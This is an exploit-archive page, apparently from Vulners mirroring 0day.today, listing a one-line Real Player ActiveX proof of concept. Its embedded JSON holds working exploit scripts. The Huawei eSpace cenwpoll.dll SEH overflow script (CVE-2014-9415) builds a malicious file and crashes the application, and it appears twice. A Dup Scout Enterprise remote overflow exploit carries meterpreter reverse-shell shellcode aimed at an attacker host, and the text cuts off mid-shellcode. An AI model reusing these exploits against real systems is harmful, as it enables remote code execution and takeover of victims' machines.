Search...

Real Player ActiveX remote buffer overflow poc

2010-01-11T00:00:00

ID 1337DAY-ID-10041
Type zdt
Reporter D3V!L FUCKER
Modified 2010-01-11T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            ==============================================
Real Player ActiveX remote buffer overflow poc
==============================================

Software Link: [http://www.real.com]
Version: [12.0.0.343]
Tested on: [win XP sp2]
 
 
&lt;object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' &gt;&lt;/object&gt;


#  0day.today [2018-03-19]  #

JSON Vulners Source

Initial Source

{"published": "2010-01-11T00:00:00", "id": "1337DAY-ID-10041", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:47:00", "bulletin": {"published": "2010-01-11T00:00:00", "id": "1337DAY-ID-10041", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": null}, "hash": "b21e49bd37553dbaaeb65bea45180c32b1660c7f9719ec452e215f7f97bd3e13", "description": "Exploit for unknown platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:47:00", "edition": 1, "title": "Real Player ActiveX remote buffer overflow poc", "href": "http://0day.today/exploit/description/10041", "modified": "2010-01-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10041", "references": [], "reporter": "D3V!L FUCKER", "sourceData": "==============================================\r\nReal Player ActiveX remote buffer overflow poc\r\n==============================================\r\n\r\nSoftware Link: [http://www.real.com]\r\nVersion: [12.0.0.343]\r\nTested on: [win XP sp2]\r\n \r\n \r\n<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' ></object>\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "modified"}, {"hash": "7d29626c4592816a9a3054ddd60b76f7", "key": "sourceData"}, {"hash": "1c590f87f05e3dd4e4eed4f35f56dedb", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "31197ce2c0ddf6f29be28630b8b5b8af", "key": "reporter"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "published"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "39204aed4291668fabc88073baefbadc", "key": "sourceHref"}, {"hash": "1ca6383ec81375ee810b54bdbf9ca5c2", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category local exploits", "hash": "7de119dbe6c24216142dfc7eb84120681310441eb080290a3c50b014f81740db", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-19T15:20:21"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46865"]}, {"type": "zdt", "idList": ["1337DAY-ID-32732", "1337DAY-ID-25351", "1337DAY-ID-26024", "1337DAY-ID-21357", "1337DAY-ID-21336", "1337DAY-ID-21196", "1337DAY-ID-21194", "1337DAY-ID-18889", "1337DAY-ID-18890", "1337DAY-ID-18885"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152965"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874620", "OPENVAS:1361412562310813504", "OPENVAS:1361412562310813505", "OPENVAS:1361412562310882892", "OPENVAS:1361412562310813503"]}, {"type": "zeroscience", "idList": ["ZSL-2016-5324"]}], "modified": "2018-03-19T15:20:21"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-03-19T15:20:21", "edition": 2, "title": "Real Player ActiveX remote buffer overflow poc", "href": "https://0day.today/exploit/description/10041", "modified": "2010-01-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/10041", "references": [], "reporter": "D3V!L FUCKER", "sourceData": "==============================================\r\nReal Player ActiveX remote buffer overflow poc\r\n==============================================\r\n\r\nSoftware Link: [http://www.real.com]\r\nVersion: [12.0.0.343]\r\nTested on: [win XP sp2]\r\n \r\n \r\n<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' ></object>\r\n\r\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "873fce856f9140c8490392bb643137b5", "key": "href"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "modified"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "31197ce2c0ddf6f29be28630b8b5b8af", "key": "reporter"}, {"hash": "bf9fcd50fbb224537c0920a094200985", "key": "sourceData"}, {"hash": "2c91e3f762158b34144a68a38eb58f5d", "key": "sourceHref"}, {"hash": "1ca6383ec81375ee810b54bdbf9ca5c2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"exploitdb": [{"lastseen": "2019-05-20T08:19:52", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "EDB-ID:46865", "href": "https://www.exploit-db.com/exploits/46865", "type": "exploitdb", "title": "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite\r\n#\r\n#\r\n# Vendor: Huawei Technologies Co., Ltd.\r\n# Product web page: https://www.huawei.com\r\n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)\r\n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290\r\n# Affected module: cenwpoll.dll 1.0.8.8\r\n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe\r\n#\r\n# Product description:\r\n# --------------------\r\n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of\r\n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides\r\n# users with easy and secure access to their service platform from any device, in any place, at any time.\r\n# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using\r\n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.\r\n#\r\n# Vulnerability description:\r\n# --------------------------\r\n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails\r\n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when\r\n# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of\r\n# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.\r\n#\r\n# Tested on:\r\n# ----------\r\n# OS Name: Microsoft Windows 7 Professional\r\n# OS Version: 6.1.7601 Service Pack 1 Build 7601\r\n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz\r\n#\r\n# Vulnerability discovered by:\r\n# ----------------------------\r\n# Gjoko 'LiquidWorm' Krstic\r\n# Senior STTE\r\n# SCD-ERC\r\n# Munich, Germany\r\n# 26th of August (Tuesday), 2014\r\n#\r\n# PSIRT details:\r\n# --------------\r\n# Security advisory No.: Huawei-SA-20141217- espace\r\n# Initial release date: Dec 17, 2014\r\n# Vulnerability ID: HWPSIRT-2014-1151\r\n# CVE ID: CVE-2014-9415\r\n# Patched version: eSpace Meeting V100R001C03\r\n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589\r\n# \r\n#\r\n# ------------------------------------ WinDBG output ------------------------------------\r\n#\r\n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045\r\n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll\r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \r\n# cenwpoll!DllUnregisterServer+0xa59e:\r\n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????\r\n# 0:008> !exchain\r\n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# mcstub+10041 (00410041)\r\n# Invalid exception stack at 00410041\r\n# Instruction Address: 0x0000000005790f3e\r\n# \r\n# Description: Exception Handler Chain Corrupted\r\n# Short Description: ExceptionHandlerCorrupted\r\n# Exploitability Classification: EXPLOITABLE\r\n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)\r\n#\r\n# Corruption of the exception handler chain is considered exploitable\r\n#\r\n# 0:008> d ebp\r\n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 0:008> u ebp\r\n# 02fecd00 41 inc ecx\r\n# 02fecd01 004100 add byte ptr [ecx],al\r\n# 02fecd04 41 inc ecx\r\n# 02fecd05 004100 add byte ptr [ecx],al\r\n# 02fecd08 41 inc ecx\r\n# 02fecd09 004100 add byte ptr [ecx],al\r\n# 02fecd0c 41 inc ecx\r\n# 02fecd0d 004100 add byte ptr [ecx],al\r\n#\r\n# ------------------------------------ /WinDBG output ------------------------------------\r\n#\r\n#\r\n\r\nimport sys, os, time\r\n\r\nos.system('title jterm')\r\nos.system('color f5')\r\nos.system('cls')\r\npiton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n\tprint '''\r\n\t+---------------------------------------------+\r\n\t| eSpace Meeting Stack Buffer Overflow Vuln |\r\n\t| |\r\n\t| Vuln ID: HWPSIRT-2014-1151 |\r\n\t| CVE ID: CVE-2014-9415 |\r\n\t+---------------------------------------------+\r\n\t'''\r\n\tif len(sys.argv) < 2:\r\n\t\tprint 'Usage: \\n\\n\\t'+piton+' <OPTION>'\r\n\t\tprint '\\nOPTION:\\n'\r\n\t\tprint '\\t0 - Create the evil PoC file.'\r\n\t\tprint '\\t1 - Create the evil file, start the vulnerable application and crash it.'\r\n\t\tprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n'\r\n\t\tquit()\r\n\r\nusage()\r\ncrash = sys.argv[1]\r\n\r\ndir = os.getcwd();\r\nfile = \"evilpoll.qes\"\r\nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x.....\r\n\r\ntime.sleep(1)\r\n# Overwrite FS:[0] chain (\\x43 = EIP)\r\nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode)\r\nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90'\r\nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00'\r\nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00'\r\nbuffer += 'ANSW1'+'\\x05\\x00'\r\nbuffer += 'ANSW2'\r\n\r\npoc = header + buffer\r\nbytes = len(poc)\r\n\r\nprint '[+] Creating evil PoC file...'\r\ntime.sleep(1)\r\nprint '[+] Buffering:\\n'\r\ntime.sleep(1)\r\n\r\nindex = 0\r\nwhile index < len(poc):\r\n\tchar = poc[index]\r\n\t#print char,\r\n\tsys.stdout.write(char)\r\n\ttime.sleep(10.0 / 1000.0)\r\n\tindex = index + 1\r\n\r\ntry:\r\n\twriteFile = open (file, 'w')\r\n\twriteFile.write( poc )\r\n\twriteFile.close()\r\n\ttime.sleep(1)\r\n\tprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!'\r\n\ttime.sleep(1)\r\n\tprint '[+] Location: \"'+dir+'\"'\r\n\tprint '[+] Wrote '+str(bytes)+' bytes.'\r\nexcept:\r\n\tprint '[-] Error while creating file!\\n'\r\n\r\nif crash == '0':\r\n\tprint '\\n\\n[+] Done!\\n'\r\nelif crash == '1':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"')\r\nelif crash == '2':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"')\r\n\tprint '\\n[+] You should see something like this in WinDBG:'\r\n\tprint '''\r\n\t0:000> d 0012e37c\r\n\t0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.\r\n\t0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.\r\n\t0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....\r\n\t0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......\r\n\t0:000> !exchain\r\n\t0012e37c: 00430043\r\n\tInvalid exception stack at 00420042\r\n\t'''\r\nelse:\r\n\tprint '[+] Have a nice day! ^^\\n'\r\n\tquit()\r\n\r\nprint '\\n[+] Have a nice day! ^^\\n'\r\n#os.system('color 07')", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46865"}], "zdt": [{"lastseen": "2019-05-21T01:54:26", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-19T00:00:00", "published": "2019-05-19T00:00:00", "id": "1337DAY-ID-32732", "href": "https://0day.today/exploit/description/32732", "title": "Huawei eSpace Meeting 1.1.11.103 - (cenwpoll.dll) SEH Buffer Overflow (Unicode) Exploit", "type": "zdt", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite\r\n#\r\n#\r\n# Vendor: Huawei Technologies Co., Ltd.\r\n# Product web page: https://www.huawei.com\r\n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)\r\n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290\r\n# Affected module: cenwpoll.dll 1.0.8.8\r\n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe\r\n#\r\n# Product description:\r\n# --------------------\r\n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of\r\n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides\r\n# users with easy and secure access to their service platform from any device, in any place, at any time.\r\n# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using\r\n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.\r\n#\r\n# Vulnerability description:\r\n# --------------------------\r\n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails\r\n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when\r\n# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of\r\n# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.\r\n#\r\n# Tested on:\r\n# ----------\r\n# OS Name: Microsoft Windows 7 Professional\r\n# OS Version: 6.1.7601 Service Pack 1 Build 7601\r\n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz\r\n#\r\n# Vulnerability discovered by:\r\n# ----------------------------\r\n# Gjoko 'LiquidWorm' Krstic\r\n# Senior STTE\r\n# SCD-ERC\r\n# Munich, Germany\r\n# 26th of August (Tuesday), 2014\r\n#\r\n# PSIRT details:\r\n# --------------\r\n# Security advisory No.: Huawei-SA-20141217- espace\r\n# Initial release date: Dec 17, 2014\r\n# Vulnerability ID: HWPSIRT-2014-1151\r\n# CVE ID: CVE-2014-9415\r\n# Patched version: eSpace Meeting V100R001C03\r\n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589\r\n# \r\n#\r\n# ------------------------------------ WinDBG output ------------------------------------\r\n#\r\n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045\r\n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll\r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \r\n# cenwpoll!DllUnregisterServer+0xa59e:\r\n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????\r\n# 0:008> !exchain\r\n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# mcstub+10041 (00410041)\r\n# Invalid exception stack at 00410041\r\n# Instruction Address: 0x0000000005790f3e\r\n# \r\n# Description: Exception Handler Chain Corrupted\r\n# Short Description: ExceptionHandlerCorrupted\r\n# Exploitability Classification: EXPLOITABLE\r\n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)\r\n#\r\n# Corruption of the exception handler chain is considered exploitable\r\n#\r\n# 0:008> d ebp\r\n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 0:008> u ebp\r\n# 02fecd00 41 inc ecx\r\n# 02fecd01 004100 add byte ptr [ecx],al\r\n# 02fecd04 41 inc ecx\r\n# 02fecd05 004100 add byte ptr [ecx],al\r\n# 02fecd08 41 inc ecx\r\n# 02fecd09 004100 add byte ptr [ecx],al\r\n# 02fecd0c 41 inc ecx\r\n# 02fecd0d 004100 add byte ptr [ecx],al\r\n#\r\n# ------------------------------------ /WinDBG output ------------------------------------\r\n#\r\n#\r\n\r\nimport sys, os, time\r\n\r\nos.system('title jterm')\r\nos.system('color f5')\r\nos.system('cls')\r\npiton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n\tprint '''\r\n\t+---------------------------------------------+\r\n\t| eSpace Meeting Stack Buffer Overflow Vuln |\r\n\t| |\r\n\t| Vuln ID: HWPSIRT-2014-1151 |\r\n\t| CVE ID: CVE-2014-9415 |\r\n\t+---------------------------------------------+\r\n\t'''\r\n\tif len(sys.argv) < 2:\r\n\t\tprint 'Usage: \\n\\n\\t'+piton+' <OPTION>'\r\n\t\tprint '\\nOPTION:\\n'\r\n\t\tprint '\\t0 - Create the evil PoC file.'\r\n\t\tprint '\\t1 - Create the evil file, start the vulnerable application and crash it.'\r\n\t\tprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n'\r\n\t\tquit()\r\n\r\nusage()\r\ncrash = sys.argv[1]\r\n\r\ndir = os.getcwd();\r\nfile = \"evilpoll.qes\"\r\nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x.....\r\n\r\ntime.sleep(1)\r\n# Overwrite FS:[0] chain (\\x43 = EIP)\r\nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode)\r\nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90'\r\nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00'\r\nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00'\r\nbuffer += 'ANSW1'+'\\x05\\x00'\r\nbuffer += 'ANSW2'\r\n\r\npoc = header + buffer\r\nbytes = len(poc)\r\n\r\nprint '[+] Creating evil PoC file...'\r\ntime.sleep(1)\r\nprint '[+] Buffering:\\n'\r\ntime.sleep(1)\r\n\r\nindex = 0\r\nwhile index < len(poc):\r\n\tchar = poc[index]\r\n\t#print char,\r\n\tsys.stdout.write(char)\r\n\ttime.sleep(10.0 / 1000.0)\r\n\tindex = index + 1\r\n\r\ntry:\r\n\twriteFile = open (file, 'w')\r\n\twriteFile.write( poc )\r\n\twriteFile.close()\r\n\ttime.sleep(1)\r\n\tprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!'\r\n\ttime.sleep(1)\r\n\tprint '[+] Location: \"'+dir+'\"'\r\n\tprint '[+] Wrote '+str(bytes)+' bytes.'\r\nexcept:\r\n\tprint '[-] Error while creating file!\\n'\r\n\r\nif crash == '0':\r\n\tprint '\\n\\n[+] Done!\\n'\r\nelif crash == '1':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"')\r\nelif crash == '2':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"')\r\n\tprint '\\n[+] You should see something like this in WinDBG:'\r\n\tprint '''\r\n\t0:000> d 0012e37c\r\n\t0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.\r\n\t0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.\r\n\t0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....\r\n\t0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......\r\n\t0:000> !exchain\r\n\t0012e37c: 00430043\r\n\tInvalid exception stack at 00420042\r\n\t'''\r\nelse:\r\n\tprint '[+] Have a nice day! ^^\\n'\r\n\tquit()\r\n\r\nprint '\\n[+] Have a nice day! ^^\\n'\r\n#os.system('color 07')\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32732"}, {"lastseen": "2018-03-19T13:16:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-10-05T00:00:00", "published": "2016-10-05T00:00:00", "id": "1337DAY-ID-25351", "href": "https://0day.today/exploit/description/25351", "type": "zdt", "title": "Dup Scout Enterprise 9.0.28 - Buffer Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n \r\nprint \"Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit\"\r\nprint \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"\r\n \r\n#Author website: www.tulpa-security.com\r\n#Author twitter: @tulpa_security\r\n \r\n#Exploit will land you NT AUTHORITY\\SYSTEM\r\n#You do not need to be authenticated, password below is garbage\r\n#Swop out IP, shellcode and remember to adjust '\\x41' for bytes\r\n#Tested on Windows 7 x86 Enterprise SP1\r\n \r\n#Shout-out to carbonated and ozzie_offsec\r\n \r\nimport socket\r\nimport sys\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.123.132',80))\r\n \r\n#bad chars \\x00\\x0a\\x0d\\x26\r\n \r\n#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x26' -f python --smallest\r\n \r\n#payload size 308\r\n \r\nbuf = \"\"\r\nbuf += \"\\xda\\xd9\\xba\\x43\\x1b\\x3f\\x40\\xd9\\x74\\x24\\xf4\\x58\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x47\\x31\\x50\\x18\\x03\\x50\\x18\\x83\\xc0\\x47\\xf9\"\r\nbuf += \"\\xca\\xbc\\xaf\\x7f\\x34\\x3d\\x2f\\xe0\\xbc\\xd8\\x1e\\x20\\xda\"\r\nbuf += \"\\xa9\\x30\\x90\\xa8\\xfc\\xbc\\x5b\\xfc\\x14\\x37\\x29\\x29\\x1a\"\r\nbuf += \"\\xf0\\x84\\x0f\\x15\\x01\\xb4\\x6c\\x34\\x81\\xc7\\xa0\\x96\\xb8\"\r\nbuf += \"\\x07\\xb5\\xd7\\xfd\\x7a\\x34\\x85\\x56\\xf0\\xeb\\x3a\\xd3\\x4c\"\r\nbuf += \"\\x30\\xb0\\xaf\\x41\\x30\\x25\\x67\\x63\\x11\\xf8\\xfc\\x3a\\xb1\"\r\nbuf += \"\\xfa\\xd1\\x36\\xf8\\xe4\\x36\\x72\\xb2\\x9f\\x8c\\x08\\x45\\x76\"\r\nbuf += \"\\xdd\\xf1\\xea\\xb7\\xd2\\x03\\xf2\\xf0\\xd4\\xfb\\x81\\x08\\x27\"\r\nbuf += \"\\x81\\x91\\xce\\x5a\\x5d\\x17\\xd5\\xfc\\x16\\x8f\\x31\\xfd\\xfb\"\r\nbuf += 